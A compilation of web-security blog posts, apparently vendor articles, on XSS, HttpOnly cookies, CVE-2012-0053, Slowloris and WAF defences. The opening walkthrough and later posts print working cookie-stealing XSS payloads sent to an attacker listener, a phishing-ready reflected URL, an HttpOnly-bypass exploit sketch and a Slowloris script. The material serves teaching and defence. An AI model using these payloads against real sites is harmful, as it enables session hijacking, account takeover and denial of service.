Cross Site Scripting (XSS) Exploit Paths
Introduction

Web application threats continue to cause serious security issues for large corporations and small businesses alike. In 2016, even the smallest local family business has a web presence, and it is important to understand the potential attack surface of any web-facing asset in order to properly understand vulnerabilities, exploitability, and thus risk. The Open Web Application Security Project (OWASP) is a non-profit organization dedicated to ensuring the safety and security of web application software, and it periodically releases a Top 10 list of common categories of web application security flaws. The current list is available at https://www.owasp.org/index.php/Top_10_2013-Top_10 (an updated list for 2016/2017 is currently in the data call phase), and is used by application developers, security professionals, software vendors and IT managers as a reference point for understanding the nature of web application security vulnerabilities. This article presents a detailed analysis of the OWASP security flaw A3: Cross-Site Scripting (XSS), including descriptions of the three broad types of XSS and possibilities for exploitation.

Cross Site Scripting (XSS)

Cross-Site Scripting (XSS) attacks are a type of web application injection attack in which malicious script is delivered to a client browser using the vulnerable web app as an intermediary. The general effect is that the client browser is tricked into performing actions not intended by the web application. The classic example of an XSS attack is to force the victim browser to throw an ‘XSS!’ or ‘Alert!’ popup, but actual exploitation can result in the theft of cookies or confidential data, download of malware, and more.

Persistent XSS

Persistent (or Stored) XSS refers to a condition where the malicious script can be stored persistently on the vulnerable system, such as in the form of a message board post. Any victim browsing the page containing the XSS script is an exploit target. This is a very serious vulnerability, as a publicly accessible stored XSS flaw could result in many thousands of stolen cookies, drive-by malware downloads, and so on. As a proof of concept for cookie theft on a simple message board application, consider the following.

Here is our freshly-installed message board application: users can post comments, admins can access the admin panel. Let’s use the typical POC exercise to validate that the message board is vulnerable to XSS. Sure enough, it is. Just throwing a dialog box is kind of boring, so let’s do something more interesting: I’m going to inject a persistent XSS script that will steal the cookies of anyone browsing the vulnerable page.

Now I start a listener on my attacking box. This can be as simple as netcat, or any webserver of your choosing (Python’s SimpleHTTPServer is another nice option):

dsyme@kylie:~$ sudo nc -nvlp 81

And wait for someone – hopefully the site admin – to browse the page. The admin has logged in and browsed the page, and my listener catches the HTTP callout from my malicious script. I now have my stolen cookie, PHPSESSID=lrft6d834uqtflqtqh5l56a5m4, and can use an intercepting proxy or cookie manager to impersonate the admin – using Burp, or using Cookie Manager for Firefox. Now I’m logged into the admin page.

Access to a web application CMS is pretty close to pwn. From here I can persist my access by creating additional admin accounts (noisy), or upload a shell (web/php reverse) to get shell access to the victim server.
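For reference, the kind of stored payload used for this cookie theft looks something like the following (a minimal sketch, not the exact script used in the walkthrough; the address assumes the attacking box running the listener above is 192.168.178.136):

<SCRIPT>
  // Exfiltrate the victim's cookies to the attacker's listener as a query string
  new Image().src = 'http://192.168.178.136:81/?' + document.cookie;
</SCRIPT>

Using new Image() keeps the victim on the page; the document.location variant shown in the reflected example below works just as well but visibly redirects the browser.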
Bear in mind that using such techniques we could easily host malware on our webserver, and every victim visiting the page with stored XSS would get a drive-by download.

Non-Persistent XSS

Non-persistent (or reflected) XSS refers to a slightly different condition in which the malicious content (script) is immediately returned by a web application, be it through an error message, search result, or some other means that echoes some part of the request back to the client. Because of its non-persistent nature, the malicious code is not stored on the vulnerable webserver, and hence it is generally necessary to trick a victim into opening a malicious link in order to exploit a reflected XSS vulnerability.

We’ll use our good friend DVWA (Damn Vulnerable Web App) for this example. First, we’ll validate that it is indeed vulnerable to a reflected XSS attack. It is. Note that this can be POC’d by using the web form, or by directly inserting code into the ‘name’ parameter in the URL.

Let’s make sure we can capture a cookie in a similar manner as before. Start a netcat listener on 192.168.178.136:81 (and yes, we could use a full-featured webserver for this to harvest many cookies), and inject the following into the ‘name’ parameter:

<SCRIPT>document.location='http://192.168.178.136:81/?'+document.cookie</SCRIPT>

We have a cookie, PHPSESSID=ikm95nv7u7dlihhlkjirehbiu2. Let’s see if we can use it to log in from the command line without using a browser:

dsyme@kylie:~$ curl -b "security=low;PHPSESSID=ikm95nv7u7dlihhlkjirehbiu2" --location "http://192.168.178.140/dvwa/" > login.html
dsyme@kylie:~$ egrep Username login.html
<div align="left"><em>Username:</em> admin<br /><em>Security Level:</em> low<br /><em>PHPIDS:</em> disabled</div>

Indeed we can. Now, of course, we just stole our own cookie here. In a real attack we’d want to steal the cookie of the actual site admin, and to do that we’d need to trick him or her into clicking the following link:

http://192.168.178.140/dvwa/vulnerabilities/xss_r/?name=victim<SCRIPT>document.location='http://192.168.178.136:81/?'+document.cookie</SCRIPT>

Or, easily enough, put it into an HTML message. And now we need to get our victim to click the link – a spear phishing attack might be a good way. And again, we start our listener and wait.

Of course, instead of stealing the admin’s cookies, we could host malware on a webserver somewhere, distribute the malicious URL by phishing campaign, host it on a compromised website, or distribute it through adware (there are many possibilities), and wait for drive-by downloads. The malicious links are often obfuscated using a URL-shortening service.

DOM-Based XSS

DOM-based XSS is an XSS attack in which the malicious payload is executed as a result of modification of the Document Object Model (DOM) environment of the victim browser. A key differentiator between DOM-based and traditional XSS attacks is that in DOM-based attacks the malicious code is not sent in the HTTP response from server to client. In some cases, suspicious activity may be detected in HTTP requests, but in many cases no malicious content is ever sent to or from the webserver. Usually, a DOM-based XSS vulnerability is introduced by poor input validation in a client-side script. A very nice demo of DOM-based XSS is presented at https://xss-doc.appspot.com/demo/3.
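The general shape of the bug is a client-side script that takes attacker-controllable input (here, the URL fragment) and passes it to an HTML-producing sink. A self-contained sketch of the pattern (illustrative only, not the demo's actual source; the function and element names are made up):

// The fragment after '#' is read by script and written into the page as markup
function showSection(fragment) {
  document.getElementById('content').innerHTML = 'Showing section: ' + fragment;   // unsafe sink
}

window.onload = function () {
  showSection(decodeURIComponent(location.hash.substring(1)) || 'home');
};

A fragment such as #<img src=x onerror=alert(document.cookie)> then executes in the victim's browser, even though nothing after the '#' is ever sent to the server.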
In the demo, the URL fragment (the portion of the URL after #, which is never sent to the server) serves as input to a client-side script – in this instance, telling the browser which tab to display. Unfortunately, the URL fragment data is passed to the client-side script in an unsafe fashion: viewing the source of the demo page, the function definition on line 8 and the call on line 33 show how the fragment is consumed. In this case we can pass a string to the URL fragment that we know will cause the function to error, e.g. “foo”, and set an error condition. Reproducing the example from the above URL, with full credit to the author, it is possible to inject code into the error condition causing an alert dialog, which could be modified in a similar fashion to steal cookies etc. And of course we could deface the site by injecting an image of our choosing from an external source.

There are other possible vectors for DOM-based XSS attacks, such as:

- Unsanitized URL or POST body parameters that are passed to the server but do not modify the HTTP response, yet are stored in the DOM to be used as input to a client-side script. An example is given at https://www.owasp.org/index.php/DOM_Based_XSS
- Interception of the HTTP response to include additional malicious scripts (or modify existing scripts) for the client browser to execute. This could be done with a man-in-the-browser attack (malicious browser extensions), malware, or response-side interception using a web proxy.

Like reflected XSS, exploitation is often accomplished by fooling a user into clicking a malicious link. DOM-based XSS is typically a client-side attack. The only circumstance under which server-side web-based defences (such as mod_security, IDS/IPS or WAF) are able to prevent DOM-based XSS is if the malicious script is sent from client to server, which is not usually the case for DOM-based XSS. As many more web applications utilize client-side components (such as sending periodic AJAX calls for updates), DOM-based XSS vulnerabilities are on the increase – an estimated 10% of the Alexa top 10k domains contained DOM-based XSS vulnerabilities according to Ben Stock, Sebastian Lekies and Martin Johns (https://www.blackhat.com/docs/asia-15/materials/asia-15-Johns-Client-Side-Protection-Against-DOM-Based-XSS-Done-Right-(tm).pdf).

Preventing XSS

XSS vulnerabilities exist due to a lack of input validation, whether on the client or server side. Secure coding practices, regular code review, and white-box penetration testing are the best ways to prevent XSS in a web application, by tackling the problem at the source. OWASP has a detailed list of rules for XSS prevention documented at https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet, and there are many other resources online on the topic. However, for many (most?) businesses, it may not be possible to conduct code reviews or commit development effort to fixing vulnerabilities identified in penetration tests. In most cases, XSS can be easily prevented by the deployment of Web Application Firewalls.
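Before moving on to WAFs, it is worth noting that most of the OWASP rules referenced above boil down to one idea: encode untrusted data for the context in which it is rendered. A minimal sketch (illustrative only; real applications should use a maintained encoding library, and the parameter and element names here are made up):

function escapeHtml(untrusted) {
  // Encode the characters that matter in an HTML element context
  return String(untrusted)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

var userName = new URLSearchParams(location.search).get('name') || 'guest';
document.getElementById('greeting').textContent = 'Hello ' + userName;   // treat input as data (safe sink)
// or, if HTML insertion is unavoidable, encode first:
// document.getElementById('greeting').innerHTML = 'Hello ' + escapeHtml(userName);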
Typical mechanisms for XSS prevention with a WAF are:

- Alerting on known XSS attack signatures
- Prevention of input of <script> tags to the application unless specifically allowed (rare)
- Prevention of input of '<' and '>' characters in web forms
- Multiple URL decoding to prevent bypass attempts using encoding (see the sketch at the end of this article)
- Enforcement of value types in HTTP parameters
- Blocking non-alphanumeric characters where they are not permitted

Typical IPS appliances lack the HTTP intelligence to provide the same level of protection as a WAF. For example, while an IPS may block the <script> tag (if it is correctly configured to intercept SSL), it may not be able to handle the URL decoding required to catch obfuscated attacks.

F5 Silverline is a cloud-based WAF solution and provides native and quick protection against XSS attacks. This can be an excellent solution for deployed production applications that include XSS vulnerabilities, because modifying the application code to remove the vulnerability can be time-consuming and resource-intensive. Full details of blocked attacks (true positives) can be viewed in the Silverline portal, enabling application and network administrators to extract key data in order to profile attackers. Similarly, time-based histograms can be displayed providing details of blocked XSS campaigns over time; here, we can see that a serious XSS attack was prevented by Silverline WAF on September 1st. F5 Application Security Manager (ASM) can provide a similar level of protection in an on-premises capacity.

It is of course highly recommended that any preventive controls be tested – which typically means running an automated vulnerability scan (good) or manual penetration test (better) against the application once the control is in place. As noted in the previous section, do not expect web-based defences such as a WAF to protect against DOM-based XSS, as most attack vectors do not actually send any malicious traffic to the server.
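The "multiple URL decoding" item above is worth illustrating, since single-pass decoding is a common bypass. The idea is simply to decode until the value stops changing and only then inspect it (a minimal sketch; a real WAF applies many more normalizations and signatures):

function fullyDecode(value) {
  // "%253Cscript%253E" decodes to "%3Cscript%3E" and only then to "<script>",
  // so a single decoding pass would miss it
  var prev = null, cur = value;
  while (cur !== prev) {
    prev = cur;
    try { cur = decodeURIComponent(cur); } catch (e) { break; }   // stop on malformed encodings
  }
  return cur;
}

function looksLikeScriptInjection(param) {
  return /<\s*script/i.test(fullyDecode(param));
}

console.log(looksLikeScriptInjection('%253Cscript%253Ealert(1)%253C%252Fscript%253E'));   // true
console.log(looksLikeScriptInjection('harmless%20text'));                                  // false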
Stop Those XSS Cookie Bandits iRule Style

In a recent post, CodingHorror blogged about a story of one of his friends’ attempts at writing his own HTML sanitizer for his website. I won’t bother repeating the details, but it all boils down to the fact that his friend noticed users were logged into his website as him and hacking away with admin access. How did this happen? It turned out to be a Cross Site Scripting attack (XSS) that found its way around his HTML sanitizing routines. A user posted some content that included mangled JavaScript that made an external reference, including all history and cookies of the current user’s session, to an alternate machine.

CodingHorror recommended adding the HttpOnly attribute to Set-Cookie response headers to help protect these cookies from being able to make their way out to remote machines. Per his blog post:

- HttpOnly restricts all access to document.cookie in IE7, Firefox 3, and Opera 9.5 (unsure about Safari)
- HttpOnly removes cookie information from the response headers in XMLHttpObject.getAllResponseHeaders() in IE7. It should do the same thing in Firefox, but it doesn't, because there's a bug.
- XMLHttpObjects may only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.

Whenever I hear about modifications made to backend servers, alarms start going off in my head and I get to thinking about how this can be accomplished on the network transparently. Well, if you happen to have a BIG-IP, then it's quite easy. A simple iRule can be constructed that will check all the response cookies and, if they do not already have the HttpOnly attribute, add it. I went one step further and added a check for the "Secure" attribute and added that one in as well for good measure.

when HTTP_RESPONSE {
  foreach cookie [HTTP::cookie names] {
    set value [HTTP::cookie value $cookie];
    if { "" != $value } {
      set testvalue [string tolower $value]
      set valuelen [string length $value]
      #log local0. "Cookie found: $cookie = $value";
      switch -glob $testvalue {
        "*;secure*" -
        "*; secure*" { }
        default { set value "$value; Secure"; }
      }
      switch -glob $testvalue {
        "*;httponly*" -
        "*; httponly*" { }
        default { set value "$value; HttpOnly"; }
      }
      if { [string length $value] > $valuelen} {
        #log local0. "Replacing cookie $cookie with $value"
        HTTP::cookie value $cookie "${value}"
      }
    }
  }
}

If you are only concerned with the Secure attribute, then you can always use the "HTTP::cookie secure" command, but as far as I can tell it won't include the HttpOnly attribute. So, if you determine that HttpOnly cookies are the way you want to go, you could manually configure these in all of your applications on your backend servers. Or... you could configure it in one place on the network. I think I prefer the second option.

-Joe
Lightboard Lessons: OWASP Top 10 - Cross Site Scripting

The OWASP Top 10 is a list of the most common security risks on the Internet today. Cross Site Scripting (XSS) comes in at the #7 spot in the latest edition of the OWASP Top 10. In this video, John discusses how Cross Site Scripting works and outlines some mitigation steps to make sure your web application stays secure against this threat.

Related Resources: Securing against the OWASP Top 10: Cross-Site Scripting
The Lock May be Broken

A couple of weeks ago, a new security advisory was published: CVE-2012-0053 – “Apache HttpOnly Cookie Disclosure”. While the severity of this vulnerability is just “medium”, there are some things that we can learn from it. As far as I see it, this vulnerability actually uses a more sophisticated approach in order to steal sensitive information. It suggests an exploit proof of concept that combines two attack methods (a rough sketch of the combination appears at the end of this post):

1. A well-known application security vulnerability named Cross-Site Scripting (XSS).
2. A newly introduced vulnerability in Apache, where sending a Cookie HTTP header that is too long causes the web server to return the cookie value – HttpOnly cookies included – in its “400 Bad Request” response page.

From the OWASP page on HttpOnly – Mitigating the Most Common XSS attack using HttpOnly:

“The majority of XSS attacks target theft of session cookies. A server could help mitigate this issue by setting the HTTPOnly flag on a cookie it creates, indicating the cookie should not be accessible on the client. If a browser that supports HttpOnly detects a cookie containing the HttpOnly flag, and client side script code attempts to read the cookie, the browser returns an empty string as the result. This causes the attack to fail by preventing the malicious (usually XSS) code from sending the data to an attacker's website.”

So the HttpOnly cookie that is not supposed to be accessed by JavaScript on the client browser can be accessed when exploiting this vulnerability. In other words, the lock may be broken, and the mechanism that is supposed to prevent an attack can, in some circumstances, be bypassed. This leads me to say that while security countermeasures are becoming more and more sophisticated over the years, security vulnerabilities and their exploits are becoming more and more elusive.

Web Application Firewalls were designed from the beginning to solve such zero-day vulnerabilities, presenting multi-layered protection for the web application by combining signature-based protection, HTTP protocol constraints, and web application behavioral anomaly detection. From a BIG-IP Application Security Manager perspective, this vulnerability can be easily mitigated by performing the following:

i. Using Cross-Site Scripting signatures in order to mitigate Cross-Site Scripting vulnerabilities.
ii. Applying a security policy that limits the header’s length.
iii. Creating a custom error page when this violation occurs.
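For reference, the combined XSS-plus-CVE-2012-0053 technique works roughly like this (an illustrative sketch only; it assumes an unpatched Apache behind the application and an existing XSS foothold on the same origin):

// Step 1: inflate the Cookie header past Apache's default header size limit with junk cookies
for (var i = 0; i < 10; i++) {
  document.cookie = 'pad' + i + '=' + new Array(900).join('x') + '; path=/';
}

// Step 2: request any page on the origin; Apache now answers "400 Bad Request"
// and echoes the oversized Cookie header - HttpOnly values included - in the error body
var xhr = new XMLHttpRequest();
xhr.open('GET', '/', false);   // synchronous purely for brevity
xhr.send();

// Step 3: the session cookie can be scraped out of xhr.responseText and exfiltrated,
// e.g. new Image().src = '//attacker.example/?c=' + encodeURIComponent(xhr.responseText);

This is exactly why limiting the header length (point ii above) stops the disclosure before Apache ever generates the verbose error page.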
F5 Friday: Eliminating the Blind Spot in Your Data Center Security Strategy

Pop Quiz: In recent weeks, which of the following attack vectors have been successfully used to breach major corporation security? (choose all that apply)

- Phishing
- Parameter tampering
- SQL Injection
- DDoS
- SlowLoris
- Data leakage

If you selected them all, give yourself a cookie because you’re absolutely right. All six of these attacks have successfully been used recently, resulting in breaches across the globe:

- International Monetary Fund
- US Government – Senate
- CIA
- Citibank
- Malaysian Government
- Sony
- Brazilian government and Petrobras (the latest LulzSec victims)

That’s no surprise; attacks are ongoing, constantly. They are relentless. Many of them are mass attacks with no specific target in mind; others are more subtle, planned and designed to do serious damage to the victim. Regardless, these breaches all have one thing in common: the breach was preventable.

At issue is the reality that attackers today have moved up the stack and are attacking in the data center’s security blind spot: the application layer. Gone are the days of blasting the walls of the data center with packets to take out a site. Data center interconnects have expanded to the point that it’s nearly impossible to disrupt network infrastructure and cause an outage without a highly concerted and distributed effort. It does happen, but it’s more frequently the case that attackers are moving to highly targeted, layer 7 attacks that are far more successful using far fewer resources with a much smaller chance of being discovered. The security-oriented infrastructure traditionally relied upon to alert on attacks is blind; unable to detect layer 7 attacks because they don’t appear to be attacks. They look just like “normal” users.

“The most recent attack, against www.cia.gov, does not appear to be particularly sophisticated. LulzSec described that attack as a simple packet flood, which overwhelms a server with volume. Analysts at F5, which focuses on application security and availability, speculated that it actually was a Slowloris attack, a low-bandwidth technique that ties up server connections by sending partial requests that are never completed. Such an attack can come in under the radar because of the low volume of traffic it generates and because it targets the application layer, Layer 7 in the OSI model, rather than the network layer, Layer 3.” [emphasis added] -- Ongoing storm of cyberattacks is preventable, experts say

It isn’t the case that organizations don’t have a sound security strategy and matching implementation; it’s that the strategy has a blind spot at the application layer. In fact, it’s been the evolution of network and transport layer security success that’s almost certainly driven attackers to climb higher up the stack in search of new and unanticipated (and often unprotected) avenues of opportunity.

ELIMINATING the BLIND SPOT

Too often organizations – and specifically developers – hear the words “layer 7” anything and immediately take umbrage at the implication they are failing to address application security. In many situations it is the application that is vulnerable, but far more often it’s not the application – it’s the application platform or protocols that are the source of contention, neither of which a developer has any real control over. Attacks designed to specifically leech off resources – SlowLoris, DDoS, HTTP floods – simply cannot be noticed or prevented by the application itself.
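To make the Slowloris reference concrete: the entire "attack" consists of well-formed requests that simply never finish. A minimal sketch of the idea (assuming Node.js on the attacking host; the target name is hypothetical, and this should obviously never be pointed at systems you don't own):

var net = require('net');

function holdConnectionOpen(host) {
  var sock = net.connect(80, host, function () {
    // A valid request line and Host header, but never the terminating blank line...
    sock.write('GET / HTTP/1.1\r\nHost: ' + host + '\r\n');
    // ...then trickle a harmless header every few seconds so the server keeps waiting
    setInterval(function () { sock.write('X-keepalive: 1\r\n'); }, 10000);
  });
}

// for (var i = 0; i < 1000; i++) holdConnectionOpen('victim.example');

From the server's point of view each connection is just a slow client, which is precisely why nothing in the request itself looks malicious.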
Neither are these attacks noticed or prevented by most security infrastructure components, because they do not appear to be attacks. In cases where protocol (HTTP) exploitation is leveraged, it is not possible to detect such an attack unless the right information is available in the right place at the right time. The right place is a strategic point of control. The right time is when the attack begins. The right information is a combination of variables – the context carried with every request that imparts information about the client, network, and server-side status. If a component can see that a particular user is sending data at a rate much slower than their network connection should allow, that tells the component it’s probably an application layer attack, which then triggers organizational policies regarding how to deal with such an attack: reject the connection, shield the application, notify an administrator.

Only a component that is positioned properly in the data center, i.e. in a strategic point of control, can properly see all the variables and make such a determination. Only a component that is designed specifically to intercept, inspect and act on data across the entire network and application stack can detect and prevent such attacks from being successfully carried out.

BIG-IP is uniquely positioned – topologically and technologically – to address exactly these kinds of multi-layer attacks. Whether the strategy to redress such attacks is “Inspect and Reject” or “Buffer and Wait”, the implementation using BIG-IP simply makes sense. Because of its position in the network – in front of applications, between clients and servers – BIG-IP has the visibility into both internal and external variables necessary. With its ability to intercept and inspect and then act upon the variables extracted, BIG-IP is perfectly suited to detecting and preventing attacks that normally wind up in most infrastructure’s blind spot.

This trend is likely to continue, and it’s also likely that additional “blind spots” will appear as consumerization via tablets and mobile devices continues to drive new platforms and protocols into the data center. Preventing attacks from breaching security and claiming victory – whether the intent is to embarrass or to profit – is the goal of a comprehensive organizational security strategy. That requires a comprehensive, i.e. multi-layer, security architecture and implementation: one without any blind spots in which an attacker can sneak up on you and penetrate your defenses. It’s time to evaluate your security strategy and systems with an eye toward whether such blind spots exist in your data center. And if they do, it’s well past time to do something about it.

More Info on Attack Prevention on DevCentral:
- DevCentral Security Forums
- DDoS Attack Protection in BIG-IP Local Traffic Manager
- DDoS Attack Protection in BIG-IP Application Security Manager
F5 Friday: Expected Behavior is not Necessarily Acceptable Behavior

Sometimes vulnerabilities are simply the result of a protocol design decision, but that doesn’t make it any less a vulnerability.

An article discussing a new attack on social networking applications that effectively provides an opening through which personal data can be leaked was passed around the Internets recently. If you haven’t read “Abusing HTTP Status Codes to Expose Private Information” yet, please do; it’s a good read and exposes, if you’ll pardon the pun, yet another “vulnerability by design” flaw that exists in many of the protocols that make the web go today.

We, as an industry, spend a lot of time picking on developers for not writing secure code, for introducing vulnerabilities and subsequently ignoring them, and for basically making the web a very scary place. We rarely, however, talk about the insecurities and flaws inherent in core protocols that contribute to the overall scariness of the Internets. Consider, for example, the misuse and abuse of HTTP as a means to carry out a DDoS attack. Such attacks are not viable due to some developer with a lax attitude toward security; they are simply the result of the way in which the protocol works. Someone discovered a way to put it to work to carry out their evil plans. The same can be said of the aforementioned “vulnerability.” This isn’t the result of developers not caring about security, it’s merely a side-effect of the way in which HTTP is supposed to work.

Site and application developers use HTTP status codes and the like to respond to requests in addition to the content returned. Some of those HTTP status codes aren’t even under the control of the site or application developer – 5xx errors are returned by the web or application server software automatically based on internal conditions. That someone has found a way to leverage these basic behaviors in a way that might allow personal information to be exposed should be no surprise. The more complex web applications – and the interactions that make the “web” an actual “web” of interconnected sites and data stores – become, the more innovative use of admittedly very basic application protocols must be made. That innovation can almost always be turned around and used for more malevolent purposes.

What was troubling, however, was Google’s response to this “vulnerability” in Gmail as described by the author. The author states he “reported it to Google and they described it as ‘expected behaviour’ and ignored it.” Now Google is right – it is expected behavior, but that doesn’t necessarily mean it’s acceptable behavior.

PROTECTING YOURSELF from BAD EXPECTED BEHAVIOR

Enabling protection against this potential exposure of personal information depends on whether you are a user or someone charged with protecting users’ information. If you didn’t read through all the comments on the article, then you missed a great suggestion for users interested in protecting themselves against what is similar to a cross-site request forgery (XSRF) attack. I’ll reproduce it here, in total, to make sure nothing is lost:

Justin Samuel: “I'm the RequestPolicy developer. Thanks for the mention. I should point out that if you're using NoScript then you're already safe as long as you haven't allowed JavaScript on this or the other sites. Of course, people do allow JavaScript in some cases but still want control over cross-site requests.
In those cases, NoScript + RequestPolicy is a great combo (it's what I use) if the usability impact of having two website-breaking, whitelist-based extensions installed is worth the security and privacy gains. RequestPolicy does have some good usability improvements planned, but if you can only stand to have one of these extensions installed, then I recommend NoScript over RequestPolicy in most situations.” (Written Tuesday, January the 25th, 2011)

So as a user, NoScript, or NoScript plus RequestPolicy, will help keep you safe from the potential misuse of this “expected behavior” by giving you the means by which you can control cross-site requests.

As someone responsible for protecting your user/customer/partner/employee information, however, you can’t necessarily force the use of NoScript or RequestPolicy or any other client-side solution. First, it doesn’t protect the data from leaving the building in the first place, and second, even if it did and you could force the installation of such solutions, you can’t necessarily control user behavior that may lead to turning it off or otherwise manipulating the environment. The reality is that organizations trying to protect both themselves and their customers can only control one thing – their own environment. That means the data center.

PROTECTING YOUR CLIENTS FROM BAD EXPECTED BEHAVIOR

To prevent data leakage of any kind – whether through behavioral or vulnerability exploitation – you need a holistic security strategy in place. The funny thing about protocol behavior exploitation, however, is that application protocol behavior is governed by the stack and the platform, not necessarily the application itself. Now, in this case it’s true that the behavior is eerily similar to a cross-site request forgery (XSRF) attack, which means developers could, and probably should, address it by enforcing policies that restrict access to specific requests based on referrer or other identifying – contextual – information. The problem is that this means modifying applications for a potential vulnerability that may or may not be exploited. It’s unlikely to have the priority necessary to garner time and effort on the application development team’s already lengthy to-do list.

Which is where a web application firewall (WAF) like BIG-IP ASM (Application Security Manager) comes into play. BIG-IP ASM can protect applications and sensitive data from attacks like XSRF right now. It doesn’t take nearly the cycles to implement an XSRF (or other web application layer) security policy using ASM as it will to address it in the application itself (if that’s even possible – sometimes it’s not). Whether ASM or any WAF ends up permanently protecting data against exploitation or not is entirely up to the organization. In some cases it may be the most financially and architecturally efficient solution; in other cases it may not. In the former, hey, great. In the latter, hey, great – you’ve got a stop-gap measure to protect data and customers and the organization until such time as a solution can be implemented, tested, and ultimately deployed. Either way, BIG-IP ASM enables organizations to quickly address expected (but still unacceptable) behavior. That means risk is nearly immediately mitigated whether or not the long-term solution remains the WAF or falls to developers.
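If it does fall to developers, the contextual restriction mentioned above amounts to checking where a sensitive request came from before honoring it. A minimal sketch (assuming Node.js; the allowed origin, endpoint path, and port are purely illustrative, and a real implementation would pair this with anti-CSRF tokens):

var http = require('http');
var ALLOWED_ORIGIN = 'https://app.example.com';   // hypothetical application origin

http.createServer(function (req, res) {
  if (req.method === 'POST' && req.url === '/account/export') {
    // Contextual check: did this request originate from our own pages?
    var source = req.headers.origin || req.headers.referer || '';
    if (source.indexOf(ALLOWED_ORIGIN) !== 0) {
      res.writeHead(403);
      return res.end('Forbidden');
    }
  }
  res.writeHead(200);
  res.end('OK');
}).listen(8080);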
Customers don’t care about the political battles or religious wars that occur regarding the role of web application firewalls in the larger data center security strategy, and they really don’t want to hear about “expected behavior” as the cause of a data leak. They care that they are protected when using applications against inadvertent theft of their private, personal data. It’s the job of IT to do just that, one way or another.

- Facebook app pages serve up Javascript and Acai Berry spam
- The “True Security Company” Red Herring
- F5 Friday: Two Heads are Better Than One
- Challenging the Firewall Data Center Dogma
- F5 Friday: Multi-Layer Security for Multi-Layer Attacks
- F5 Friday: You’ll Catch More Bees with Honey(pots)
- Defeating Attacks Easier Than Detecting Them
- 2011 Hactivism Report
- Security is Our Job
- F5 Networks Hacktivism Focus Group
4 Reasons We Must Redefine Web Application Security

Mike Fratto loves to tweak my nose about web application security. He’s been doing it for years, so it’s (d)evolved to a pretty standard set of arguments. But after he tweaked the debate again in a tweet, I got to thinking that part of the problem is the definition of web application security itself.

Web application security is almost always about the application (I know, duh! but bear with me) and therefore about the developer and secure coding. Most of the programmatic errors that lead to vulnerabilities and subsequently exploitation can be traced to a lack of secure coding practices, particularly around the validation of user input (which should never, ever be trusted). Whether it’s XSS (Cross Site Scripting) or SQL Injection, the root of the problem is that malicious data or code is submitted to an application and not properly ferreted out by sanitization routines written by developers, for whatever reason.

But there are a number of “web application” attacks that have nothing to do with developers and code, and are, in fact, more focused on the exploitation of protocols. TCP and HTTP can be easily manipulated in such a way as to result in a successful attack on an application without breaking any RFC or W3C standard that specifies the proper behavior of these protocols. Worse, the application developer really can’t do anything about these types of attacks because the application isn’t aware they are occurring. It is, in fact, the four layers of the TCP/IP stack – the foundation for web applications – that are the reason we need to redefine web application security and expand it to include the network where it makes sense.

Being a “web” application necessarily implies network interaction, which implies reliance on the network stack, which implies potential exploitation of the protocols upon which applications and their developers rely but have little or no control over. Web applications ride atop the OSI stack, above and beyond the network and application model on which all web applications are deployed. But those web applications have very little control or visibility into that stack, and network-focused security (firewalls, IDS/IPS) has very little awareness of the application.

Let’s take a Layer 7 DoS attack as an example. L7 DoS works by exploiting the nature of HTTP 1.1 and its ability to essentially pipeline multiple HTTP requests over the same TCP connection. Ostensibly this behavior reduces the overhead on the server associated with opening and closing TCP connections and thus improves the overall capacity and performance of web and application servers. So far, all good. But this behavior can be used against an application. By requesting a legitimate web page using HTTP 1.1, TCP connections on the server are held open waiting for additional requests to be submitted. And they’ll stay open until the client sends the appropriate HTTP Connection: close header with a request or the TCP session itself times out based on the configuration of the web or application server.

Now, imagine a single source opens a lot – say thousands – of pages. They are all legitimate requests; there’s no malicious data involved or incorrect usage of the underlying protocols. From the application’s perspective this is not an attack. And yet it is an attack. It’s a basic resource consumption attack designed to chew up all available TCP connections on the server such that legitimate users cannot be served.
The distinction between legitimate users and legitimate requests is paramount to understanding why web application security isn’t always just about the application; sometimes it’s about protocols and behavior external to the application that cannot be controlled, let alone detected, by the application or its developers. The developer, in order to detect such a misuse of the HTTP protocol, would need to keep what we in the network world call a “session table”. Web and application servers keep this information – they have to – but they don’t make it accessible to the developer. Basically, the developer’s viewpoint is from inside a single session, dealing with a single request, dealing with a single user. The developer, and the application, have a very limited view of the environment in which the application operates.

A web application firewall, however, necessarily has access to its session table. It operates with a viewpoint external to the application, with the ability to understand the “big picture” (see the sketch at the end of this post). It can detect when a single user is opening three or four or thousands of connections and not doing anything with them. It understands that the user is not legitimate because the user’s behavior is out of line with how a normal user interacts with an application. A web application firewall has the context in which to evaluate the behavior and requests and realize that a single user opening multiple connections is not legitimate after all.

Not all web application security is about the application. Sometimes it’s about the protocols and languages and platforms supporting the delivery of that application. And when the application lacks visibility into those supporting infrastructure environments, it’s pretty damn difficult for the application developer to use secure coding to protect against exploitation of those facets of the application. We really have to stop debating where web application security belongs and go back to the beginning and redefine what it means in a web-driven distributed world if we’re going to effectively tackle the problem any time this century.
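To make the “session table” point concrete, the kind of cross-request visibility described above looks roughly like this (a minimal sketch, assuming Node.js; the threshold is arbitrary and a real WAF or proxy weighs far more context than a simple count):

var net = require('net');
var openPerClient = {};   // connections currently open, keyed by client address

var server = net.createServer(function (sock) {
  var ip = sock.remoteAddress;
  openPerClient[ip] = (openPerClient[ip] || 0) + 1;

  // A single source holding hundreds of connections open and idle is behaving
  // unlike any legitimate user - shed it before it exhausts the connection table
  if (openPerClient[ip] > 100) {
    sock.destroy();
  }
  sock.on('close', function () { openPerClient[ip] -= 1; });
});

server.listen(8080);

No individual request here is malformed; only the aggregate behavior, visible from outside the application, gives the attack away.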
Why it's so hard to secure JavaScript

The discussion yesterday on JavaScript and security got me thinking about why it is that there are no good options other than script management add-ons like NoScript for securing JavaScript.

In a compiled language there may be multiple ways to write a loop, but the underlying object code generated is the same. A loop is a loop, regardless of how it's represented in the language. Security products that insert shims into the stack, run as a proxy on the server, or reside in the network can look for anomalies in that object code. This is the basis for many types of network security - IDS, IPS, AVS, intelligent firewalls. They look for anomalies in signatures and if they find one they consider it a threat.

While the execution of a loop in an interpreted language is also the same regardless of how it's represented, it looks different to security devices because it's often text-based, as is the case with JavaScript and XML. There are only two good options for externally applying security to languages that are interpreted on the client: pattern matching/regex and parsing.

